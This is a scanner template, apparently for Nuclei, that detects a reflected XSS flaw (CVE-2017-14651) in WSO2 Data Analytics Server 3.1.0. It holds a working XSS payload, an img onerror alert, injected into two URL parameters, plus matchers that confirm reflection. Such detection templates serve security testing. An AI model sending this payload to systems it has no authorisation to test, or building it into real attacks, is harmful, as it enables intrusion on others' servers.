id: CVE-2017-14651

info:
  name: Reflected XSS - WSO2 Data Analytics Server
  author: mass0ma
  severity: medium
  description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
  tags: cve,cve2017,wso2,xss
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.80
    cve-id: CVE-2017-14651
    cwe-id: CWE-79
  reference:
    - https://github.com/cybersecurityworks/Disclosed/issues/15
    - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265
    - https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html

requests:
  - method: GET
    path:
      - "{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<img src=x onerror=alert(document.domain)>"
          - "Failed to add new collection"
        part: body
        condition: and

      - type: word
        words:
          - "text/html"
        part: header